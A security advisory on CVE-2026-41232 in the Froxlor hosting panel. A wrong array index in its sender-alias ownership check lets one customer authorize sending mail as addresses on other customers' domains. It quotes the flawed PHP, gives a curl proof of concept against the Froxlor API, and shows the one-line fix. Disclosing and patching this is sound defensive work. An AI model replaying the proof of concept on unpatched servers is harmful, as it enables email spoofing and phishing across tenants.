Summary
In EmailSender::add(), the domain ownership validation for full email sender aliases uses the wrong array index when splitting the email address, passing the local part instead of the domain to validateLocalDomainOwnership(). This causes the ownership check to always pass for non-existent "domains," allowing any authenticated customer to add sender aliases for email addresses on domains belonging to other customers. Postfix's sender_login_maps then authorizes the attacker to send emails as those addresses.
Details
In lib/Froxlor/Api/Commands/EmailSender.php at line 100, when a customer adds a full email address (not a @domain wildcard) as an allowed sender, the code splits on @ and takes index [0]:
// Line 96-106
if (substr($allowed_sender, 0, 1) != '@') {
if (!Validate::validateEmail($idna_convert->encode($allowed_sender))) {
Response::standardError('emailiswrong', $allowed_sender, true);
}
self::validateLocalDomainOwnership(explode("@", $allowed_sender)[0] ?? ""); // BUG: [0] is the local part
} else {
if (!Validate::validateDomain($idna_convert->encode(substr($allowed_sender, 1)))) {
Response::standardError('wildcardemailiswrong', substr($allowed_sender, 1), true);
}
self::validateLocalDomainOwnership(substr($allowed_sender, 1)); // CORRECT: passes domain
}
For input [email protected], explode("@", "[email protected]") returns ["admin", "domain-b.com"]. Index [0] is "admin", the local part, not the domain.
The validateLocalDomainOwnership() function (lines 346-355) then queries panel_domains for a domain matching "admin":
private static function validateLocalDomainOwnership(string $domain): void
{
$sel_stmt = Database::prepare("SELECT customerid FROM `" . TABLE_PANEL_DOMAINS . "` WHERE `domain` = :domain");
$domain_result = Database::pexecute_first($sel_stmt, ['domain' => $domain]);
if ($domain_result && $domain_result['customerid'] != CurrentUser::getField('customerid')) {
Response::standardError('senderdomainnotowned', $domain, true);
}
}
Since no domain named "admin" exists in panel_domains, $domain_result is false, and the function returns without error, the ownership check silently passes.
The inserted mail_sender_aliases row is then picked up by Postfix's sender_login_maps query (configured in mysql-virtual_sender_permissions.cf):
... UNION (SELECT mail_sender_aliases.email FROM mail_sender_aliases
WHERE mail_sender_aliases.allowed_sender = '%s') ...
This query maps the allowed_sender back to the mail user, authorizing them to send as that address via SMTP.
PoC
# Prerequisites: Froxlor instance with mail.enable_allow_sender enabled,
# two customers: Customer A (owns domain-a.com) and Customer B (owns domain-b.com)
# Step 1: As Customer A, add a sender alias claiming Customer B's domain
# Via API:
curl -X POST 'https://froxlor-host/api/v1/' \
-H 'Authorization: Basic <customer-A-credentials>' \
-H 'Content-Type: application/json' \
-d '{
"command": "EmailSender.add",
"params": {
"emailaddr": "[email protected]",
"allowed_sender": "[email protected]"
}
}'
# Expected: Error "senderdomainnotowned" because domain-b.com belongs to Customer B
# Actual: 200 OK, alias is created because validateLocalDomainOwnership
# receives "ceo" (local part) instead of "domain-b.com" (domain)
# Step 2: Verify the alias was inserted
curl -X POST 'https://froxlor-host/api/v1/' \
-H 'Authorization: Basic <customer-A-credentials>' \
-H 'Content-Type: application/json' \
-d '{
"command": "EmailSender.listing",
"params": {"emailaddr": "[email protected]"}
}'
# Step 3: Customer A can now send email as [email protected] via SMTP
# because Postfix sender_login_maps will match the mail_sender_aliases entry
# and authorize Customer A's mail account to use that sender address.
The same attack works via the web UI by POST-ing to customer_email.php with action=add_sender and the target domain in allowed_domain.
Impact
Any authenticated customer on a multi-tenant Froxlor instance can add sender aliases for email addresses on domains belonging to other customers. This allows:
- Cross-customer email spoofing: Send emails impersonating users on other customers' domains, bypassing Postfix's
smtpd_sender_login_mapsrestriction that is specifically designed to prevent this. - Multi-tenant isolation breach: The domain ownership check (
validateLocalDomainOwnership) is the only barrier preventing cross-customer sender aliasing, and it is completely ineffective for full email addresses. - Phishing and reputation damage: Spoofed emails originate from the legitimate mail server, passing SPF/DKIM checks for the target domain if those records point to the Froxlor server.
Note: The wildcard (@domain) code path at line 105 is not affected, it correctly passes the domain to validateLocalDomainOwnership().
The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions. Typical impact: unauthorized data access or execution of privileged operations.
CVE-2026-41232 has a CVSS score of 5.0 (Medium). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.3.6); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Change index [0] to [1] on line 100 of lib/Froxlor/Api/Commands/EmailSender.php:
// Before (line 100):
self::validateLocalDomainOwnership(explode("@", $allowed_sender)[0] ?? "");
// After:
self::validateLocalDomainOwnership(explode("@", $allowed_sender)[1] ?? "");
This ensures the domain part of the email address is passed to the ownership validation, matching the behavior of the wildcard path on line 105.
Frequently Asked Questions
- What is CVE-2026-41232? CVE-2026-41232 is a medium-severity incorrect authorization vulnerability in froxlor/froxlor (composer), affecting versions < 2.3.6. It is fixed in 2.3.6. The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions.
- How severe is CVE-2026-41232? CVE-2026-41232 has a CVSS score of 5.0 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of froxlor/froxlor are affected by CVE-2026-41232? froxlor/froxlor (composer) versions < 2.3.6 is affected.
- Is there a fix for CVE-2026-41232? Yes. CVE-2026-41232 is fixed in 2.3.6. Upgrade to this version or later.
- Is CVE-2026-41232 exploitable, and should I be worried? Whether CVE-2026-41232 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-41232 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-41232? Upgrade
froxlor/froxlorto 2.3.6 or later.